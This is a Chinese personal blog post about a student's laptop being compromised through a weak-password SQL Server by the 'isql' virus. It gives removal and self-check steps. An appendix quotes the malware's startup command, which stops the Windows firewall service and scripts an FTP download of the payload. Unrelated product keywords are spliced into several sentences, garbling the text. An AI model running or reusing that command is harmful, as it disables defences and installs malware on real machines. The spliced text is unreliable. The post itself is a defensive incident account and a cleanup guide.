在公共网络被isql病毒远程攻击——电脑上启用SQL服务器和Guest用户的同学们注意!! ∙ 交待一下背景:最近在做毕业设计,笔记本上开启了Guest用户和SQLserver,这两个嫌疑最大。
本次被入侵的原因可能是以下之一:
1、 SQLserver的漏洞,被对方扫描到氧浓度传感器1433端口,而且是弱口令,于是通过SQL已有的注册表模块进行攻击(上网搜:isql 病毒)。
2、 Guest用户没有加密码,也许被对方远程扫描到了,通过telnet登录了我的电脑(这个原因的可能性不大)。
首先,360提醒我,有一个进程(其实这个是伪装的攻击)修改了注册表,增加了开机启动项。点击查看,启动项是一个cmd命令,进程是sqlsever。360默认允许了,于是我也没管。 然后不对劲了,360和杀毒软件Avast都开始报毒,说是有木马被植入,已经自动拦截——其实没有拦截住。(这是因为,此病毒一旦侵入,获取管理员权限,和杀毒软件的资格基本上平起平坐。而且刚才植入的木马进程,已经在后台开启了一个FTP连接,远程下载病毒到我的硬盘) 接着,Avast又报毒,说有一个backdoor仿生机器人后门程序被植入(如上文,刚下载的)。
打开任务管理器,发现后台运行着(命令控制台),(文件传输协议)。这两个进程是我没有默认开启的。
到这儿已经基本确定是被侵入了,立刻断网、关机。
==========================分割线==================================
重启之后,自动弹出一个cmd窗口,企图进行远程FTP连接(目的是下载病毒)——这儿挺幸运的,如果我的电脑是自动联网的,那么这个窗口会一闪而过,在后台运行,不易被察觉。
由于没有联网,所以这个病毒进程卡住了,说是FTP连接失败。
解决方法:
1、开机后按F8,进入安全模式,在C:\windows\system32目录里,到isql文件夹,彻底删除。
2、 重启,正常模式开机,打开控制面板,禁用Guest账户。
3、 打开360,查杀木马,显示多了一个启动项,这个启动项的目的是通过打开cmd,在后台打开FTP传输——通过它来把病毒进一步下载到硬盘。
4、 查看开机启动项,果然有一个shell(加壳的意思吧?),就是上面这句说的非法操作。
于是果断把它删除。
5、开启windows防火墙。
6、把本机上SQL服务器的sa密码改掉。
水玻璃铸造7、改掉本机SQL服务器的默认端口1433.
(最后三条操作酌情进行)
重启,查看网络连接,恢复正常了。
平时怀疑自己的电脑中毒了,这样自查一下:
1. cmd里面输入netstat,查看当前的网络连接,有没有非法的。
闪光灯柔光罩2. 用360查看网络连接,这个更容易看懂一些,不过有些进程,比如杀毒软件,会与ysn-264 远程服务器保持联系,看起来会有嫌疑。
3. 你的防护软件如果突然报毒,也是值得怀疑的~
附注:此病毒添加的启动项是:
c:\windows\ /c net1 stop sharedaccess&echo open > &echo 123>> &echo 123>> &echo binary >> &echo >> &echo bye >> &ftp -&p -&&&
解释一下就是停止WINDOWS数码转移印花防火墙服务,然后从指定的地址下载病毒,再删除日志文件